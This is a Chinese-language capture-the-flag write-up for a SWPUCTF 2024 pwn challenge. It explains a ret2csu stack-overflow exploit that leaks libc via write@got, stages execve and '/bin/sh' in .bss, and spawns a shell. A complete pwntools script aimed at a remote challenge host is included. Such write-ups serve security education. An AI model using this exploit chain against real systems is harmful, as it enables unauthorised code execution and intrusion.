[SWPUCTF 2024 秋季新生赛]出题人你到底干了什么？

main 函数

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t n; // rax
  _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF
  char *s; // [rsp+58h] [rbp-8h]

  s = s_;
  n = strlen(s_);
  write(1, s_, n);
  read(0, buf, 0x200u);
  return 0;
}

ROPgadget --binary ./attachment --only "pop rdx; ret"

没有 pop_rdx; ret 的寄存方式，我们这里需要用到 ret2csu，先寻找 csu 片段：

.text:00000000004011D0 ; =============== S U B R O U T I N E =======================================
.text:00000000004011D0
.text:00000000004011D0
.text:00000000004011D0 ; void _libc_csu_init(void)
.text:00000000004011D0                 public __libc_csu_init
.text:00000000004011D0 __libc_csu_init proc near               ; DATA XREF: _start+1A↑o
.text:00000000004011D0 ; __unwind {
.text:00000000004011D0                 endbr64
.text:00000000004011D4                 push    r15
.text:00000000004011D6                 lea     r15, __frame_dummy_init_array_entry
.text:00000000004011DD                 push    r14
.text:00000000004011DF                 mov     r14, rdx
.text:00000000004011E2                 push    r13
.text:00000000004011E4                 mov     r13, rsi
.text:00000000004011E7                 push    r12
.text:00000000004011E9                 mov     r12d, edi
.text:00000000004011EC                 push    rbp
.text:00000000004011ED                 lea     rbp, __do_global_dtors_aux_fini_array_entry
.text:00000000004011F4                 push    rbx
.text:00000000004011F5                 sub     rbp, r15
.text:00000000004011F8                 sub     rsp, 8
.text:00000000004011FC                 call    _init_proc
.text:0000000000401201                 sar     rbp, 3
.text:0000000000401205                 jz      short loc_401226
.text:0000000000401207                 xor     ebx, ebx
.text:0000000000401209                 nop     dword ptr [rax+00000000h]
.text:0000000000401210
.text:0000000000401210 loc_401210:                             ; CODE XREF: __libc_csu_init+54↓j                     
.text:0000000000401210                 mov     rdx, r14
.text:0000000000401213                 mov     rsi, r13
.text:0000000000401216                 mov     edi, r12d
.text:0000000000401219                 call    ds:(__frame_dummy_init_array_entry - 403E10h)[r15+rbx*8]
.text:000000000040121D                 add     rbx, 1
.text:0000000000401221                 cmp     rbp, rbx
.text:0000000000401224                 jnz     short loc_401210
.text:0000000000401226
.text:0000000000401226 loc_401226:                             ; CODE XREF: __libc_csu_init+35↑j
.text:0000000000401226                 add     rsp, 8
.text:000000000040122A                 pop     rbx                                                            
.text:000000000040122B                 pop     rbp
.text:000000000040122C                 pop     r12
.text:000000000040122E                 pop     r13
.text:0000000000401230                 pop     r14
.text:0000000000401232                 pop     r15
.text:0000000000401234                 retn
.text:0000000000401234 ; } // starts at 4011D0
.text:0000000000401234 __libc_csu_init endp
.text:0000000000401234

开始封装 csu 函数：

gadget1_addr = 0x40122A
gadget2_addr = 0x401210
def csu(rbx, rbp, r12, r13, r14, r15, ret_addr):
    payload = b'a' * 104               # 覆盖局部变量和rbp
    payload += p64(gadget1_addr)       # 跳转到pop寄存器处
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) # 填入寄存器的值
    payload += p64(gadget2_addr)       # 跳转到mov赋值并call的地址
    payload += b'b' * 0x38             # 栈填充
    payload += p64(ret_addr)           # 返回地址
    sh.sendline(payload)
    sleep(1)

• 为什么填 0x38（56字节）的 b’b’？ 当 gadget2 中的 call 函数执行完毕返回后，程序会继续往下走，遇到 add rbx, 1; cmp rbx, rbp; jnz …。因为我们让 rbx=0, rbp=1，所以不跳转。 接下来程序会执行 add rsp, 8 以及 6 个 pop 指令（rbx, rbp, r12, r13, r14, r15），总共需要消耗栈上的 7×8=56 字节（即 0x38）。填充这些垃圾数据后，最后的 ret 指令才能正好拿到我们设置的 ret_addr。

第一次 csu 泄露 libc 基址：

sh.recv()
csu(0,1,1,write_got,8,write_got,main_addr)
sh.recv()
gdb.attach(sh)
pause()

write_addr=u64(sh.recv(8))
info(f'write_addr is:{write_addr}')

libcaddress=write_addr-libc.symbols['write']
system_addr=libcaddress+libc.symbols['execve']

第二次 csu 将 execve 地址和 /bin/sh 写入 BSS 段

sh.recv()
csu(0,1,0,bss_base,16,read_got,main_addr)
sh.send(p64(system_addr)+b'/bin/sh\x00')

相当于调用了 read(0, bss_base, 16)

第三次 csu 执行 execve(‘/bin/sh’)

csu(0,1,bss_base+8,0,0,bss_base,main_addr)
sh.interactive()

相当于调用 execve(“/bin/sh”, 0, 0)。

r12=bss_base+8 -> edi=bss_base+8 (参数 1 变成了指向 "/bin/sh" 字符串的指针。注：虽然 edi 只有 32 位，但只要程序的 bss 段地址小于 0xFFFFFFFF，截断也不会影响地址准确性)

from pwn import *
context.arch = 'amd64'
elf = ELF("./attachment")
# libc = ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so")
sh = remote("node6.anna.nssctf.cn",29719)
libc = ELF('./libc.so.6')
# sh = process('./attachment')
write_got = elf.got['write']
read_got = elf.got['read']
main_addr = elf.symbols['main']
bss_base = elf.bss()


gadget1_addr = 0x40122A
gadget2_addr = 0x401210
def csu(rbx, rbp, r12, r13, r14, r15, ret_addr):
    payload = b'a' * 104   # to overflow
    payload += p64(gadget1_addr)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) # to set reg value
    payload += p64(gadget2_addr) # gadget1 ret
    payload += b'b' * 0x38  # to padding stack
    payload += p64(ret_addr) # gadget2 -> gadget1 -> ret
    sh.sendline(payload)
    sleep(1)

sh.recv()
csu(0,1,1,write_got,8,write_got,main_addr)

write_addr=u64(sh.recv(8))
libcaddress=write_addr-libc.symbols['write']
system_addr=libcaddress+libc.symbols['execve']

sh.recv()
csu(0,1,0,bss_base,16,read_got,main_addr)
sh.send(p64(system_addr)+b'/bin/sh\x00')

sh.recv()
csu(0,1,bss_base+8,0,0,bss_base,main_addr)
sh.interactive()

更新: 2026-04-05 11:46:59
原文: https://www.yuque.com/idcm/wnemg9/qy093zeo63hc9a2g